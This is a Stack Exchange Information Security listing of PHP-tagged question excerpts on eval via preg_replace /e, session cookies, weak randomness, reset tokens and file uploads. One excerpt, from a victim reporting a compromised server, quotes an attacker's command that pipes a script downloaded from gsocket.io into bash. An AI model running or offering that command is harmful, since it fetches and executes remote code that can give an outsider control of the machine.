Skip to main content
Information Security

Questions tagged [php]

Ask Question

Security aspects concerning code written in the programming language PHP which is often used for web applications.

1,644 questions
Newest Active Bountied Unanswered
0 votes
0 answers
84 views

I'm experimenting with old PHP (5.3.10) code that uses the now-deprecated /e modifier in preg_replace. I understand /e evaluates the replacement string as PHP code. Example <?php $string = 'phpinfo(...
nebilx's user avatar
  • 1
1 vote
2 answers
127 views

I'm running a WordPress instance for a dropshipping site and have implemented some of the common security practices. One of these involves redirecting access attempts to known attack surfaces (e.g., /...
user267502's user avatar
  • 11
2 votes
0 answers
93 views

TL;DR: seeing a website attack that's new to us, wondering if it is a known thing, or if it's directed at some framework that we're not using. The attack is against a site's index.php script and feeds ...
Tom Swiss's user avatar
  • 21
0 votes
2 answers
247 views

I've been researching the best ways and practices for handling remember-me cookies for my website's users so that they have active sessions and stay logged in for 30 days. These articles here for ...
Absorbent-Sponge's user avatar
  • 1
0 votes
1 answer
120 views

I’ve developed a web interface that allows users to install or remove specific game addons. The site is hosted with Nginx, uses PHP on the backend, and is served over HTTPS. To perform an installation ...
sirzento's user avatar
  • 101
-2 votes
1 answer
115 views

I'm reviewing a PHP library that interacts with an Informix database. Since I'm following the library structure I cannot use pdo. Is it there a guideline on how to properly protect an Informix query ...
Marco Nappi's user avatar
  • 122
1 vote
1 answer
76 views

Does PHP's Composer package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them? I see a lot of guides ...
Michael Altfield's user avatar
  • 1,196
1 vote
0 answers
106 views

I have a situation where a webserver behind a network firewall is ran inside of Docker containers. It is setup in this order: Caddy webserver - acts as WAF, GEOIP block, IP blacklist, HTTP Security ...
Bob Ortiz's user avatar
  • 7,725
6 votes
1 answer
2k views

I need to encrypt and decrypt some passwords in PHP. Normally I would hash them, but I need to be able to decrypt them again because they're keys for an external service. I googled around a bit, but ...
mpen's user avatar
  • 180
0 votes
0 answers
22 views

My customer server has been compromised. They running this script by the PHP script bash -c "$(curl -fsSL https://gsocket.io/x)" and I have several folder in /tmp file as below -rw------- 1 ...
Yohanes AI's user avatar
  • 101
2 votes
2 answers
955 views

I'm hosting a website on a free hosting provider server that uses PHP for OTP-based authentication. Here’s how it works: If an unregistered IP address visits the site, it shows an "Unauthorized&...
Akhil Akkapelli's user avatar
  • 35
1 vote
0 answers
116 views

I am creating an exericse for my users, where I am trying to tell them that using mt_rand() is not a good option from security point of view. What I did is that I showed them a normal user who gets a ...
Johnny's user avatar
  • 343
0 votes
2 answers
237 views

I was going through this article, https://www.ambionics.io/blog/php-mt-rand-prediction, which claims that if we use mt_rand(), we can get the seed value using two values instead of brute forcing. In ...
Johnny's user avatar
  • 343
11 votes
3 answers
3k views

I am using the following code in my code to send a password reset token to a user. $token = md5($user_id . time()); Why this is considered as a bad approach being cited as it has a weak entropy. The ...
Johnny's user avatar
  • 343
0 votes
1 answer
493 views

I am testing a web application and I found a file upload vulnerability where I can upload php files to the server with the ability to know the path. The issue is that when I go to the file path, the ...
0xx7's user avatar
  • 1

15 30 50 per page
1
2 3 4 5
110